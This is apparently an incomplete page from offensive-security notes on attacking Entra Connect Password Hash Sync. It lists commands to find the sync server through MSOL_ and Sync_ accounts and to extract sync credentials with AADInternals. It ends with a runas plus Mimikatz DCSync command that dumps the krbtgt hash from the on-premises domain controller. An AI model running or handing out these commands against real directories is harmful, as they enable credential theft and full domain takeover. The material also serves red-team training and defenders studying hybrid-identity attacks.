Password Hash Sync

An on-premises AD can be integrated with Entra ID using Entra Connect with the following methods: PHS, PTA, Federation.

You can enumerate the server where Entra connect is installed using the following on-prem enumeration (assuming that the server is domain joined - which is the Microsoft recommended method)

This section needs a lot of work, not complete

1

Enumerate the server where Entra connect is installed

Using the ActiveDirectory module:

Get-ADUser -Filter "samAccountName -like 'MSOL_*'" -Properties * | select SamAccountName,Description | fl

Or from Entra ID (below command uses the Azure AD module)

Get-AzureADUser -All $true | ?{$_.userPrincipalName -match "Sync_"
2

Extract credentials

Once the Entra connect server is compromised. Use the below commands from the AADInternals module to extract credentials.

Get-AADIntSyncCredentials
3

Using the creds of MSOL_* account, we can run DCSync against the on- prem AD

runas /netonly /user:defeng.corp\MSOL_782bef6aa0a9 cmd Invoke-Mimikatz -Command '"lsadump::dcsync /user:defeng\krbtgt /domain:defeng.corp /dc:defeng-dc.defeng.corp"'

PreviousApplication ProxyNextPersistance

Last updated